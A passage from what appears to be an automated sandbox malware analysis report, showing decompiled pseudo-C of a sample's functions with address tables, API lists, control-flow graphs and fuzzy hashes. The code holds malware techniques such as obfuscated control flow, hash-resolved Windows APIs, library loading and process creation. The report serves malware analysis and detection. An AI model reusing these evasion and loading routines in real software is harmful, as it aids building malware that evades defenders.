											asm("sbb [esp+0x2c], ecx");
											continue;
										}
									}
								}
							}
							L35:
						}
						if(_t58 == 0x2c2d24c8) {
							if( *0x31de04 == 0) {
								_t66 = E00313F00(0x9bab0b12);
								_t122 = 0xb66d748a;
								 *0x31de04 = E00313E60(_t96, _t66, 0xb66d748a, _t128);
							}
							_t64 = CreateFileW( &_v524, _v584, _v596, 0, _v592, _v588, 0); // executed
							_t128 = _t64;
							if(_t128 == 0xffffffff) {
								goto L34;
							} else {
								_t58 = 0x6f65414;
								goto L2;
							}
						} else {
							if(_t58 == 0x343bfd89) {
								_t58 = 0x2f64d8b;
								goto L2;
							} else {
								if(_t58 == 0x3557bd8c) {
									if( *0x31de3c == 0) {
										 *0x31de3c = E00313E60(_t96, E00313F00(0x9bab0b12), 0x20de7595, _t128);
									}
									CloseHandle(_t128); // executed
									L34:
									return _t96;
								} else {
									goto L24;
								}
							}
						}
						goto L35;
						L24:
					} while (_t58 != 0xcfe8e);
					return _t96;
					goto L35;
				}
			}













































                                                                                0x003180a0
                                                                                0x003180a0
                                                                                0x003180a6
                                                                                0x003180ae
                                                                                0x003180b3
                                                                                0x003180bb
                                                                                0x003180c3
                                                                                0x003180ca
                                                                                0x003180ce
                                                                                0x003180d2
                                                                                0x003180d9
                                                                                0x003180e0
                                                                                0x003180e7
                                                                                0x003180ee
                                                                                0x003180f5
                                                                                0x003180fc
                                                                                0x00318103
                                                                                0x00318112
                                                                                0x00318116
                                                                                0x00318119
                                                                                0x0031811d
                                                                                0x00318125
                                                                                0x00318133
                                                                                0x00318137
                                                                                0x0031813f
                                                                                0x00318147
                                                                                0x0031814f
                                                                                0x00318153
                                                                                0x0031815b
                                                                                0x00318163
                                                                                0x00318163
                                                                                0x00318168
                                                                                0x00318170
                                                                                0x00318170
                                                                                0x00318170
                                                                                0x00318170
                                                                                0x00318175
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0031817b
                                                                                0x0031828c
                                                                                0x00318291
                                                                                0x00318297
                                                                                0x0031829b
                                                                                0x003182b3
                                                                                0x003182b5
                                                                                0x003182b5
                                                                                0x003182bb
                                                                                0x003182c1
                                                                                0x003182c8
                                                                                0x003182d7
                                                                                0x003182d9
                                                                                0x003182de
                                                                                0x003182e3
                                                                                0x003182ea
                                                                                0x003182ef
                                                                                0x003182f6
                                                                                0x003182fb
                                                                                0x003182fb
                                                                                0x00318302
                                                                                0x00318304
                                                                                0x0031830b
                                                                                0x00318312
                                                                                0x00318317
                                                                                0x0031831e
                                                                                0x00318323
                                                                                0x00318323
                                                                                0x0031832c
                                                                                0x0031832e
                                                                                0x00000000
                                                                                0x00318181
                                                                                0x00318186
                                                                                0x00318252
                                                                                0x00318259
                                                                                0x00318260
                                                                                0x00318265
                                                                                0x0031826c
                                                                                0x00318271
                                                                                0x00318271
                                                                                0x0031827b
                                                                                0x0031827d
                                                                                0x00000000
                                                                                0x0031818c
                                                                                0x00318191
                                                                                0x003181e3
                                                                                0x003181e7
                                                                                0x003181eb
                                                                                0x003181ef
                                                                                0x003181f3
                                                                                0x003181f7
                                                                                0x003181fb
                                                                                0x00318200
                                                                                0x00318204
                                                                                0x00318208
                                                                                0x0031820c
                                                                                0x00318210
                                                                                0x0031821a
                                                                                0x00318221
                                                                                0x00318226
                                                                                0x0031822d
                                                                                0x00318232
                                                                                0x00318232
                                                                                0x00318241
                                                                                0x00318245
                                                                                0x0031824a
                                                                                0x00000000
                                                                                0x00318193
                                                                                0x00318198
                                                                                0x00000000
                                                                                0x0031819e
                                                                                0x003181a0
                                                                                0x003181a8
                                                                                0x003181c4
                                                                                0x003181c8
                                                                                0x003181d4
                                                                                0x003181d8
                                                                                0x003181dd
                                                                                0x00000000
                                                                                0x003181dd
                                                                                0x00318198
                                                                                0x00318191
                                                                                0x00318186
                                                                                0x00000000
                                                                                0x0031817b
                                                                                0x0031833d
                                                                                0x00318377
                                                                                0x0031837e
                                                                                0x00318383
                                                                                0x00318391
                                                                                0x00318391
                                                                                0x003183b4
                                                                                0x003183b6
                                                                                0x003183bb
                                                                                0x00000000
                                                                                0x003183bd
                                                                                0x003183bd
                                                                                0x00000000
                                                                                0x003183bd
                                                                                0x0031833f
                                                                                0x00318344
                                                                                0x00318365
                                                                                0x00000000
                                                                                0x00318346
                                                                                0x0031834b
                                                                                0x003183ce
                                                                                0x003183e6
                                                                                0x003183e6
                                                                                0x003183ec
                                                                                0x003183f1
                                                                                0x003183fa
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0031834b
                                                                                0x00318344
                                                                                0x00000000
                                                                                0x0031834d
                                                                                0x0031834d
                                                                                0x00318364
                                                                                0x00000000
                                                                                0x00318364

                                                                                APIs
                                                                                • CreateFileW.KERNELBASE(?,?,?,00000000,?,?,00000000,?,3251FEFE,?,?), ref: 003183B4
                                                                                • CloseHandle.KERNELBASE(?,?,3251FEFE,?,?), ref: 003183EC
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000010.00000002.2321187425.0000000000311000.00000020.00000001.sdmp, Offset: 00310000, based on PE: true
                                                                                • Associated: 00000010.00000002.2321183753.0000000000310000.00000004.00000001.sdmp Download File
                                                                                • Associated: 00000010.00000002.2321193940.000000000031D000.00000004.00000001.sdmp Download File
                                                                                • Associated: 00000010.00000002.2321198666.000000000031F000.00000002.00000001.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_16_2_310000_upnp.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseCreateFileHandle
                                                                                • String ID: P
                                                                                • API String ID: 3498533004-290524615
                                                                                • Opcode ID: c8a554dcb5172a219c2a4e7c4b77d7ab0c581a88bc706a82458f14415beb136c
                                                                                • Instruction ID: c5e872ced096a907b758f2c19d1ca6b45d777480fddf97bd9e0afc503422094f
                                                                                • Opcode Fuzzy Hash: c8a554dcb5172a219c2a4e7c4b77d7ab0c581a88bc706a82458f14415beb136c
                                                                                • Instruction Fuzzy Hash: 0A81CF756083009FD71EDF68C8446ABBBE9EB9C744F00482DF495CB290EB74CD828B56
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00317120, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 107libraryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 355 317120 356 317125-31712a 355->356 357 317130 356->357 358 3171b4-3171b9 356->358 359 317233-317248 call 3134c0 357->359 360 317136-31713b 357->360 361 317207-31720c 358->361 362 3171bb 358->362 379 317265-317278 LoadLibraryW 359->379 380 31724a-317260 call 313f00 call 313e60 359->380 365 317190-317195 360->365 366 31713d 360->366 363 317227-31722c 361->363 364 31720e-317222 call 317080 361->364 368 3171bd-3171c2 362->368 369 3171ee-317202 call 317080 362->369 363->356 376 317232 363->376 364->356 365->363 375 31719b-3171af call 317080 365->375 377 31717a-31718e call 317080 366->377 378 31713f-317144 366->378 371 3171d5-3171e9 call 317080 368->371 372 3171c4-3171c9 368->372 369->356 371->356 372->363 381 3171cb-3171d0 372->381 375->356 377->356 387 317164-317178 call 317080 378->387 388 317146-31714b 378->388 393 317295-3172a0 379->393 394 31727a-317290 call 313f00 call 313e60 379->394 380->379 381->356 387->356 388->363 389 317151-317162 call 317080 388->389 389->356 407 3172a2-3172b8 call 313f00 call 313e60 393->407 408 3172bd-3172c5 393->408 394->393 407->408
                                                                                C-Code - Quality: 85%
                                                                                			E00317120(void* __ebx) {
				void* _t2;
				struct HINSTANCE__* _t8;
				intOrPtr* _t9;
				intOrPtr* _t11;
				void* _t21;
				intOrPtr _t23;
				void* _t48;
				WCHAR* _t51;
				void* _t53;
				void* _t54;
				void* _t55;

				_t21 = __ebx;
				_t2 = 0x291da748;
				goto L1;
				do {
					while(1) {
						L1:
						_t54 = _t2 - 0x1a8031ec;
						if(_t54 > 0) {
							break;
						}
						if(_t54 == 0) {
							_t51 = E003134C0(0x31d830);
							__eflags =  *0x31dd1c;
							if( *0x31dd1c == 0) {
								 *0x31dd1c = E00313E60(_t21, E00313F00(0x9bab0b12), 0xe4b28d97, _t53);
							}
							_t8 = LoadLibraryW(_t51);
							_t23 =  *0x31e548; // 0x547ec8
							 *(_t23 + 0x4c) = _t8;
							_t9 =  *0x31e494;
							__eflags = _t9;
							if(_t9 == 0) {
								_t9 = E00313E60(_t21, E00313F00(0x9bab0b12), 0x7facde30, _t53);
								 *0x31e494 = _t9;
							}
							_t48 =  *_t9();
							_t11 =  *0x31df30;
							__eflags = _t11;
							if(_t11 == 0) {
								_t11 = E00313E60(_t21, E00313F00(0x9bab0b12), 0x5010a54d, _t53);
								 *0x31df30 = _t11;
							}
							return  *_t11(_t48, 0, _t51);
						} else {
							_t55 = _t2 - 0x185e9846;
							if(_t55 > 0) {
								__eflags = _t2 - 0x18843476;
								if(__eflags != 0) {
									goto L21;
								} else {
									E00317080(_t21, 0x31d7a0, 4, __eflags);
									_t2 = 0x2eb73d4f;
									continue;
								}
							} else {
								if(_t55 == 0) {
									E00317080(_t21, 0x31d8f0, 2, __eflags);
									_t2 = 0x9da2520;
									continue;
								} else {
									if(_t2 == 0x9da2520) {
										E00317080(_t21, 0x31d800, 3, __eflags);
										_t2 = 0x18843476;
										continue;
									} else {
										_t57 = _t2 - 0x15a7f569;
										if(_t2 != 0x15a7f569) {
											goto L21;
										} else {
											E00317080(_t21, 0x31d860, 0, _t57);
											_t2 = 0x39797244;
											continue;
										}
									}
								}
							}
						}
						L30:
					}
					__eflags = _t2 - 0x2eb73d4f;
					if(__eflags > 0) {
						__eflags = _t2 - 0x39797244;
						if(__eflags != 0) {
							goto L21;
						} else {
							E00317080(_t21, 0x31d890, 1, __eflags);
							_t2 = 0x185e9846;
							goto L1;
						}
					} else {
						if(__eflags == 0) {
							E00317080(_t21, 0x31d7e0, 5, __eflags);
							_t2 = 0x22a44863;
							goto L1;
						} else {
							__eflags = _t2 - 0x22a44863;
							if(__eflags == 0) {
								E00317080(_t21, 0x31d8c0, 6, __eflags);
								_t2 = 0x1a8031ec;
								goto L1;
							} else {
								__eflags = _t2 - 0x291da748;
								if(__eflags != 0) {
									goto L21;
								} else {
									_t2 = 0x15a7f569;
									goto L1;
								}
							}
						}
					}
					goto L30;
					L21:
					__eflags = _t2 - 0x21acdd7e;
				} while (__eflags != 0);
				return _t2;
				goto L30;
			}














                                                                                0x00317120
                                                                                0x00317120
                                                                                0x00317120
                                                                                0x00317125
                                                                                0x00317125
                                                                                0x00317125
                                                                                0x00317125
                                                                                0x0031712a
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00317130
                                                                                0x0031723f
                                                                                0x00317246
                                                                                0x00317248
                                                                                0x00317260
                                                                                0x00317260
                                                                                0x00317266
                                                                                0x00317268
                                                                                0x0031726e
                                                                                0x00317271
                                                                                0x00317276
                                                                                0x00317278
                                                                                0x0031728b
                                                                                0x00317290
                                                                                0x00317290
                                                                                0x00317297
                                                                                0x00317299
                                                                                0x0031729e
                                                                                0x003172a0
                                                                                0x003172b3
                                                                                0x003172b8
                                                                                0x003172b8
                                                                                0x003172c5
                                                                                0x00317136
                                                                                0x00317136
                                                                                0x0031713b
                                                                                0x00317190
                                                                                0x00317195
                                                                                0x00000000
                                                                                0x0031719b
                                                                                0x003171a5
                                                                                0x003171aa
                                                                                0x00000000
                                                                                0x003171aa
                                                                                0x0031713d
                                                                                0x0031713d
                                                                                0x00317184
                                                                                0x00317189
                                                                                0x00000000
                                                                                0x0031713f
                                                                                0x00317144
                                                                                0x0031716e
                                                                                0x00317173
                                                                                0x00000000
                                                                                0x00317146
                                                                                0x00317146
                                                                                0x0031714b
                                                                                0x00000000
                                                                                0x00317151
                                                                                0x00317158
                                                                                0x0031715d
                                                                                0x00000000
                                                                                0x0031715d
                                                                                0x0031714b
                                                                                0x00317144
                                                                                0x0031713d
                                                                                0x0031713b
                                                                                0x00000000
                                                                                0x00317130
                                                                                0x003171b4
                                                                                0x003171b9
                                                                                0x00317207
                                                                                0x0031720c
                                                                                0x00000000
                                                                                0x0031720e
                                                                                0x00317218
                                                                                0x0031721d
                                                                                0x00000000
                                                                                0x0031721d
                                                                                0x003171bb
                                                                                0x003171bb
                                                                                0x003171f8
                                                                                0x003171fd
                                                                                0x00000000
                                                                                0x003171bd
                                                                                0x003171bd
                                                                                0x003171c2
                                                                                0x003171df
                                                                                0x003171e4
                                                                                0x00000000
                                                                                0x003171c4
                                                                                0x003171c4
                                                                                0x003171c9
                                                                                0x00000000
                                                                                0x003171cb
                                                                                0x003171cb
                                                                                0x00000000
                                                                                0x003171cb
                                                                                0x003171c9
                                                                                0x003171c2
                                                                                0x003171bb
                                                                                0x00000000
                                                                                0x00317227
                                                                                0x00317227
                                                                                0x00317227
                                                                                0x00317232
                                                                                0x00000000

                                                                                APIs
                                                                                • LoadLibraryW.KERNEL32(00000000,?,3251FEFE,003168AC), ref: 00317266
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000010.00000002.2321187425.0000000000311000.00000020.00000001.sdmp, Offset: 00310000, based on PE: true
                                                                                • Associated: 00000010.00000002.2321183753.0000000000310000.00000004.00000001.sdmp Download File
                                                                                • Associated: 00000010.00000002.2321193940.000000000031D000.00000004.00000001.sdmp Download File
                                                                                • Associated: 00000010.00000002.2321198666.000000000031F000.00000002.00000001.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_16_2_310000_upnp.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: LibraryLoad
                                                                                • String ID: Dry9$Dry9
                                                                                • API String ID: 1029625771-121480178
                                                                                • Opcode ID: ce9b39c4e09dfc7f12f0f704bed011a026e5e92f393d787a745c3a804a45433e
                                                                                • Instruction ID: a145ac5bdb2250a97abe8c53e47e82e2a7077acbacdd11e489f832d44b3a069a
                                                                                • Opcode Fuzzy Hash: ce9b39c4e09dfc7f12f0f704bed011a026e5e92f393d787a745c3a804a45433e
                                                                                • Instruction Fuzzy Hash: 0731A120B0C21053DB2FAABA58913EA11BA97AD304F394436F452CF795DD26CEC34392
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00314B70, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 87processCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 415 314b70-314b80 416 314b82-314b98 call 313f00 call 313e60 415->416 417 314b9d-314bba 415->417 416->417 422 314bd7-314bf5 CreateProcessW 417->422 423 314bbc-314bd2 call 313f00 call 313e60 417->423 426 314c73-314c7a 422->426 427 314bf7-314bfd 422->427 423->422 428 314c14-314c1b 427->428 429 314bff-314c13 427->429 431 314c38-314c45 428->431 432 314c1d-314c33 call 313f00 call 313e60 428->432 439 314c62-314c72 431->439 440 314c47-314c5d call 313f00 call 313e60 431->440 432->431 440->439
                                                                                C-Code - Quality: 60%
                                                                                			E00314B70(void* __ebx, WCHAR* __ecx, WCHAR* __edx, void* __ebp, int _a4, intOrPtr _a12) {
				struct _STARTUPINFOW _v72;
				struct _PROCESS_INFORMATION _v88;
				intOrPtr* _t9;
				int _t12;
				intOrPtr* _t15;
				intOrPtr* _t17;
				WCHAR* _t44;
				WCHAR* _t45;

				_t46 = __ebp;
				_t26 = __ebx;
				_t9 =  *0x31ddc0;
				_t45 = __edx;
				_t44 = __ecx;
				if(_t9 == 0) {
					_t9 = E00313E60(__ebx, E00313F00(0xc6fbcd74), 0x7e0ae558, __ebp);
					 *0x31ddc0 = _t9;
				}
				 *_t9( &_v72, 0, 0x44);
				_v72.cb = 0x44;
				if( *0x31e21c == 0) {
					 *0x31e21c = E00313E60(_t26, E00313F00(0x9bab0b12), 0xbd6cc871, _t46);
				}
				_t12 = CreateProcessW(_t44, _t45, 0, 0, _a4, 0, 0, 0,  &_v72,  &_v88); // executed
				if(_t12 == 0) {
					return 0;
				} else {
					if(_a12 == 0) {
						_t15 =  *0x31de3c;
						if(_t15 == 0) {
							_t15 = E00313E60(_t26, E00313F00(0x9bab0b12), 0x20de7595, _t46);
							 *0x31de3c = _t15;
						}
						 *_t15(_v88.hProcess);
						_t17 =  *0x31de3c;
						if(_t17 == 0) {
							_t17 = E00313E60(_t26, E00313F00(0x9bab0b12), 0x20de7595, _t46);
							 *0x31de3c = _t17;
						}
						 *_t17(_v88.hProcess);
						return 1;
					} else {
						asm("movdqu xmm0, [esp+0x8]");
						asm("movdqu [eax], xmm0");
						return 1;
					}
				}
			}











                                                                                0x00314b70
                                                                                0x00314b70
                                                                                0x00314b70
                                                                                0x00314b79
                                                                                0x00314b7c
                                                                                0x00314b80
                                                                                0x00314b93
                                                                                0x00314b98
                                                                                0x00314b98
                                                                                0x00314ba6
                                                                                0x00314bb0
                                                                                0x00314bba
                                                                                0x00314bd2
                                                                                0x00314bd2
                                                                                0x00314bf1
                                                                                0x00314bf5
                                                                                0x00314c7a
                                                                                0x00314bf7
                                                                                0x00314bfd
                                                                                0x00314c14
                                                                                0x00314c1b
                                                                                0x00314c2e
                                                                                0x00314c33
                                                                                0x00314c33
                                                                                0x00314c3c
                                                                                0x00314c3e
                                                                                0x00314c45
                                                                                0x00314c58
                                                                                0x00314c5d
                                                                                0x00314c5d
                                                                                0x00314c66
                                                                                0x00314c72
                                                                                0x00314bff
                                                                                0x00314bff
                                                                                0x00314c05
                                                                                0x00314c13
                                                                                0x00314c13
                                                                                0x00314bfd

                                                                                APIs
                                                                                • CreateProcessW.KERNEL32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,?,?), ref: 00314BF1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000010.00000002.2321187425.0000000000311000.00000020.00000001.sdmp, Offset: 00310000, based on PE: true
                                                                                • Associated: 00000010.00000002.2321183753.0000000000310000.00000004.00000001.sdmp Download File
                                                                                • Associated: 00000010.00000002.2321193940.000000000031D000.00000004.00000001.sdmp Download File
                                                                                • Associated: 00000010.00000002.2321198666.000000000031F000.00000002.00000001.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_16_2_310000_upnp.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateProcess
                                                                                • String ID: D$X~
                                                                                • API String ID: 963392458-2090554203
                                                                                • Opcode ID: 55add989266e895a047e943970ed2409dcab0915a02c2a6b99b36dd1d9bad822
                                                                                • Instruction ID: f1e36f7e82d2252c95945837e2248b859750ddaccb863006794abc4b0aaa6dc9
                                                                                • Opcode Fuzzy Hash: 55add989266e895a047e943970ed2409dcab0915a02c2a6b99b36dd1d9bad822
                                                                                • Instruction Fuzzy Hash: 8C21B5317043016BEB1AAB7ADC51BEB37AAABD9704F00842CF554CF290FA70CD558791
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 003130A0, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 165memoryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 529 3130a0-3130b6 530 3130ba-3130bf 529->530 531 3130c0-3130c5 530->531 532 313201-313206 531->532 533 3130cb 531->533 536 313245-31324c 532->536 537 313208-31320d 532->537 534 3130d1-3130d6 533->534 535 3131ed-3131f1 533->535 542 3131da-3131e8 534->542 543 3130dc-3130e1 534->543 540 3131f7-3131fc 535->540 541 3132f6-313300 535->541 538 313269-313274 536->538 539 31324e-313264 call 313f00 call 313e60 536->539 544 313213-313218 537->544 545 3132ab-3132b3 537->545 564 313291-31329f RtlAllocateHeap 538->564 565 313276-31328c call 313f00 call 313e60 538->565 539->538 540->531 542->531 549 3131a0-3131a8 543->549 550 3130e7-3130ec 543->550 551 31321a-313228 call 313d00 544->551 552 31322d-313232 544->552 546 3132d3-3132f3 545->546 547 3132b5-3132cd call 313f00 call 313e60 545->547 546->541 547->546 558 3131c8-3131d5 549->558 559 3131aa-3131c2 call 313f00 call 313e60 549->559 550->552 556 3130f2-31319b 550->556 551->530 552->531 560 313238-313242 552->560 556->530 558->530 559->558 564->541 572 3132a1-3132a6 564->572 565->564 572->530
                                                                                C-Code - Quality: 71%
                                                                                			E003130A0() {
				void* __ebx;
				void* __ecx;
				void* __ebp;
				void* _t61;
				intOrPtr* _t62;
				void* _t65;
				intOrPtr _t93;
				intOrPtr* _t95;
				intOrPtr _t107;
				intOrPtr* _t116;
				void* _t127;
				void* _t128;
				intOrPtr _t129;
				signed int _t134;
				void* _t135;
				void* _t136;

				_t93 =  *((intOrPtr*)(_t135 + 0xc));
				_t61 = 0x11f367c2;
				_t134 =  *(_t135 + 0x10);
				_t129 =  *((intOrPtr*)(_t135 + 0x14));
				_t127 =  *(_t135 + 0x18);
				while(1) {
					L1:
					do {
						while(1) {
							L2:
							_t136 = _t61 - 0x12466c01;
							if(_t136 > 0) {
								break;
							}
							if(_t136 == 0) {
								if(_t93 !=  *(_t135 + 0x18)) {
									L29:
									return 1;
								} else {
									_t61 = 0x2f21cdd2;
									continue;
								}
							} else {
								if(_t61 == 0x7a26146) {
									_t61 =  ==  ? 0x2f21cdd2 : 0x12466c01;
									continue;
								} else {
									if(_t61 == 0x8928514) {
										_t95 =  *0x31e1cc;
										if(_t95 == 0) {
											_t95 = E00313E60(_t93, E00313F00(0x55ab7d30), 0x815a9da3, _t134);
											 *0x31e1cc = _t95;
										}
										_t129 =  *_t95(_t134 + 0x2c);
										_t61 = 0x39d78901;
										while(1) {
											L1:
											goto L2;
										}
									} else {
										if(_t61 != 0x11f367c2) {
											goto L18;
										} else {
											 *(_t135 + 0x18) = 0x2e7c;
											 *(_t135 + 0x18) = 0x3e0f83e1 *  *(_t135 + 0x18) >> 0x20 >> 4;
											 *(_t135 + 0x18) =  *(_t135 + 0x18) >> 7;
											 *(_t135 + 0x18) = 0x2f149903 *  *(_t135 + 0x18) >> 0x20 >> 4;
											 *(_t135 + 0x18) =  *(_t135 + 0x18) + 0xffff1475;
											 *(_t135 + 0x18) =  *(_t135 + 0x18) * 0x15;
											 *(_t135 + 0x18) =  *(_t135 + 0x18) >> 2;
											 *(_t135 + 0x18) = 0x22b63cbf *  *(_t135 + 0x18) >> 0x20 >> 4;
											 *(_t135 + 0x18) =  *(_t135 + 0x18) ^ 0x8ee7705c;
											 *(_t135 + 0x10) = 0xa461;
											 *(_t135 + 0x10) =  *(_t135 + 0x10) << 0xe;
											 *(_t135 + 0x10) =  *(_t135 + 0x10) * 8 -  *(_t135 + 0x10) << 2;
											_t61 = 0x8928514;
											 *(_t135 + 0x10) = 0x51eb851f *  *(_t135 + 0x10) >> 0x20 >> 3;
											 *(_t135 + 0x10) =  *(_t135 + 0x10) + 0xffffb6ab;
											 *(_t135 + 0x10) =  *(_t135 + 0x10) ^ 0x88f30986;
											while(1) {
												L1:
												goto L2;
											}
										}
									}
								}
							}
							L30:
						}
						if(_t61 == 0x2f21cdd2) {
							_t62 =  *0x31e494;
							if(_t62 == 0) {
								_t62 = E00313E60(_t93, E00313F00(0x9bab0b12), 0x7facde30, _t134);
								 *0x31e494 = _t62;
							}
							_t128 =  *_t62();
							if( *0x31dd18 == 0) {
								 *0x31dd18 = E00313E60(_t93, E00313F00(0x9bab0b12), 0x9ff0609c, _t134);
							}
							_t65 = RtlAllocateHeap(_t128, 8, 0x24c); // executed
							_t127 = _t65;
							if(_t127 == 0) {
								goto L29;
							} else {
								_t61 = 0x35eaa088;
								goto L1;
							}
						} else {
							if(_t61 == 0x35eaa088) {
								_t116 =  *0x31e43c;
								if(_t116 == 0) {
									_t116 = E00313E60(_t93, E00313F00(0x9bab0b12), 0x2df4d385, _t134);
									 *0x31e43c = _t116;
								}
								 *_t116(_t127 + 0x3c, _t134 + 0x2c, (_t129 - _t134 - 0x2c >> 1) + 1);
								_t107 =  *((intOrPtr*)(_t135 + 0x1c));
								 *(_t127 + 0x2c) =  *(_t107 + 0x1c);
								 *((intOrPtr*)(_t107 + 0xc)) =  *((intOrPtr*)(_t107 + 0xc)) + 1;
								 *(_t107 + 0x1c) = _t127;
								goto L29;
							} else {
								if(_t61 != 0x39d78901) {
									goto L18;
								} else {
									_t93 = E00313D00(_t129);
									_t61 = 0x7a26146;
									while(1) {
										L1:
										goto L2;
									}
								}
							}
						}
						goto L30;
						L18:
					} while (_t61 != 0x100ad7b4);
					return 1;
					goto L30;
				}
			}



















                                                                                0x003130a2
                                                                                0x003130a6
                                                                                0x003130ac
                                                                                0x003130b1
                                                                                0x003130b6
                                                                                0x003130ba
                                                                                0x003130ba
                                                                                0x003130c0
                                                                                0x003130c0
                                                                                0x003130c0
                                                                                0x003130c0
                                                                                0x003130c5
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x003130cb
                                                                                0x003131f1
                                                                                0x003132f9
                                                                                0x00313300
                                                                                0x003131f7
                                                                                0x003131f7
                                                                                0x00000000
                                                                                0x003131f7
                                                                                0x003130d1
                                                                                0x003130d6
                                                                                0x003131e5
                                                                                0x00000000
                                                                                0x003130dc
                                                                                0x003130e1
                                                                                0x003131a0
                                                                                0x003131a8
                                                                                0x003131c0
                                                                                0x003131c2
                                                                                0x003131c2
                                                                                0x003131ce
                                                                                0x003131d0
                                                                                0x003130ba
                                                                                0x003130ba
                                                                                0x00000000
                                                                                0x003130ba
                                                                                0x003130e7
                                                                                0x003130ec
                                                                                0x00000000
                                                                                0x003130f2
                                                                                0x003130f2
                                                                                0x0031310d
                                                                                0x00313111
                                                                                0x0031311f
                                                                                0x00313123
                                                                                0x00313130
                                                                                0x00313139
                                                                                0x00313147
                                                                                0x0031314b
                                                                                0x00313153
                                                                                0x0031315b
                                                                                0x00313175
                                                                                0x0031317f
                                                                                0x00313187
                                                                                0x0031318b
                                                                                0x00313193
                                                                                0x003130ba
                                                                                0x003130ba
                                                                                0x00000000
                                                                                0x003130ba
                                                                                0x003130ba
                                                                                0x003130ec
                                                                                0x003130e1
                                                                                0x003130d6
                                                                                0x00000000
                                                                                0x003130cb
                                                                                0x00313206
                                                                                0x00313245
                                                                                0x0031324c
                                                                                0x0031325f
                                                                                0x00313264
                                                                                0x00313264
                                                                                0x0031326b
                                                                                0x00313274
                                                                                0x0031328c
                                                                                0x0031328c
                                                                                0x00313299
                                                                                0x0031329b
                                                                                0x0031329f
                                                                                0x00000000
                                                                                0x003132a1
                                                                                0x003132a1
                                                                                0x00000000
                                                                                0x003132a1
                                                                                0x00313208
                                                                                0x0031320d
                                                                                0x003132ab
                                                                                0x003132b3
                                                                                0x003132cb
                                                                                0x003132cd
                                                                                0x003132cd
                                                                                0x003132e4
                                                                                0x003132e6
                                                                                0x003132ed
                                                                                0x003132f0
                                                                                0x003132f3
                                                                                0x00000000
                                                                                0x00313213
                                                                                0x00313218
                                                                                0x00000000
                                                                                0x0031321a
                                                                                0x00313221
                                                                                0x00313223
                                                                                0x003130ba
                                                                                0x003130ba
                                                                                0x00000000
                                                                                0x003130ba
                                                                                0x003130ba
                                                                                0x00313218
                                                                                0x0031320d
                                                                                0x00000000
                                                                                0x0031322d
                                                                                0x0031322d
                                                                                0x00313242
                                                                                0x00000000
                                                                                0x00313242

                                                                                APIs
                                                                                • RtlAllocateHeap.NTDLL(00000000,00000008,0000024C), ref: 00313299
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000010.00000002.2321187425.0000000000311000.00000020.00000001.sdmp, Offset: 00310000, based on PE: true
                                                                                • Associated: 00000010.00000002.2321183753.0000000000310000.00000004.00000001.sdmp Download File
                                                                                • Associated: 00000010.00000002.2321193940.000000000031D000.00000004.00000001.sdmp Download File
                                                                                • Associated: 00000010.00000002.2321198666.000000000031F000.00000002.00000001.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_16_2_310000_upnp.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AllocateHeap
                                                                                • String ID: |.
                                                                                • API String ID: 1279760036-512043466
                                                                                • Opcode ID: 1133f6920fccfdbf97f6d1402a11a340983411546b3c474791aef75f92e2f461
                                                                                • Instruction ID: 01c9c8d46cc6be1d71df7e133c8c8ac3b63e8275cf8759c73a13c6fff615ef56
                                                                                • Opcode Fuzzy Hash: 1133f6920fccfdbf97f6d1402a11a340983411546b3c474791aef75f92e2f461
                                                                                • Instruction Fuzzy Hash: 5F51A2717083018BC71DDF6CD4855AA7BEAEBDC344F20482EE451CB751DB31DA8A8792
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00300580, Relevance: 3.1, APIs: 2, Instructions: 127memoryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 580 300580-3005be call 300ed0 583 3005c0-3005cf 580->583 584 3005d2-3005da 580->584 585 3005e0-3005e3 584->585 586 3006e7-3006ef 584->586 585->586 587 3005e9-3005eb 585->587 587->586 588 3005f1-3005fc 587->588 588->586 590 300602-300607 588->590 591 3006d8-3006e4 590->591 592 30060d-300629 call 301140 RtlMoveMemory 590->592 595 300654-300659 592->595 596 30062b-300630 592->596 599 30065b-30066a 595->599 600 30066c-300678 595->600 597 300632-300641 596->597 598 300643-300652 596->598 601 300679-300699 call 301140 597->601 598->601 599->601 600->601 601->586 604 30069b-3006a3 VirtualProtect 601->604 605 3006a5-3006a8 604->605 606 3006c6-3006d5 604->606 605->586 607 3006aa-3006ad 605->607 607->586 608 3006af-3006b1 607->608 608->592 609 3006b7-3006c3 608->609
                                                                                APIs
                                                                                  • Part of subcall function 00300FB0: RtlMoveMemory.NTDLL(00000000,?,00000040), ref: 00300F08
